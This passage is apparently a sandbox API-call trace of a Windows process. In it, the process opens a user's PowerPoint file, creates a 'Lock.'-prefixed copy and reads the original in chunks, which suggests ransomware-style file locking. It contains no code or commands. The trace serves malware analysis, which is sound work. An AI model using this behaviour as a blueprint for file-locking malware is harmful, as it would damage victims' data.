wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.136] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.136] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.136] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/qf_lD4ykVY6P7.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\qf_ld4ykvy6p7.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0220.137] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0220.137] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0220.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7200 [0220.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0220.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0220.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0220.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0220.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0220.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0220.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0220.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0220.137] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0220.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0220.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0220.137] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0220.137] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0220.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0220.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0220.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0220.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0220.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0220.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0220.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0220.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0220.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0220.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0220.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0220.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0220.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0220.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0220.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0220.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0220.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0220.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0220.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854c68 [0220.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0220.138] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0220.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854c68 | out: hHeap=0x2af0000) returned 1 [0220.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0220.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0220.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0220.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0220.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0220.138] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.qf_lD4ykVY6P7.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.qf_ld4ykvy6p7.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0220.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fe0 [0220.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0220.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0220.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0220.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0220.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0220.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0220.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0220.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0220.139] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0220.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0220.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0220.140] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0220.140] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0220.140] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0220.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0220.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0220.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0220.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0220.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0220.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0220.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0220.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0220.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0220.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0220.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0220.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0220.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0220.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0220.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0220.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0220.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0220.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0220.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0220.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0220.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0220.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0220.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0220.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0220.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0220.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0220.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0220.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0220.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0220.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0220.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x54e5020 [0220.143] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0220.143] ReadFile (in: hFile=0x510, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0220.146] ReadFile (in: hFile=0x510, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x7685, lpOverlapped=0x0) returned 1 [0220.147] ReadFile (in: hFile=0x510, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0220.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0220.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0220.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0220.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0220.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17685) returned 0x2a8a138 [0220.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x54e5020 | out: hHeap=0x2af0000) returned 1 [0220.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0220.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0220.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0220.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0220.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0220.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0220.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0220.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0220.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17685) returned 0x2aae878 [0220.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0220.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0220.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0220.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0220.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0220.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0220.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0220.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17685) returned 0x2ac5f08 [0220.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0220.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ac5f08 | out: hHeap=0x2af0000) returned 1 [0220.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0220.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0220.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0220.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0220.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0220.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0220.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0220.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0220.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0220.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0220.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0220.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0220.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0220.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0220.155] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0220.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0220.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0220.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0220.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72378 [0220.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0220.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0220.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0220.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0220.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17685) returned 0x2ac5f08 [0220.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0220.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72288 [0220.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0220.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0220.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0220.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72348 [0220.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0220.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0220.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0220.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72388 [0220.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0220.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0220.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0220.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaafa8 [0220.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0220.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0220.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0220.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0220.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0220.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0220.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0220.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17685) returned 0x2a8a138 [0220.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0220.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0220.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0220.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0220.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0220.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0220.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0220.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0220.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0220.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0220.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0220.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0220.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0220.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0220.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0220.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0220.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0220.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0220.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0220.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0220.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0220.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0220.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0220.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0220.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0220.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0220.157] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0220.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0220.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0220.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0220.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0220.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0220.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0220.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0220.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0220.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0220.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0220.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0220.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0220.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0220.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0220.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0220.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0220.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0220.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0220.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0220.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0220.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0220.158] HeapFree 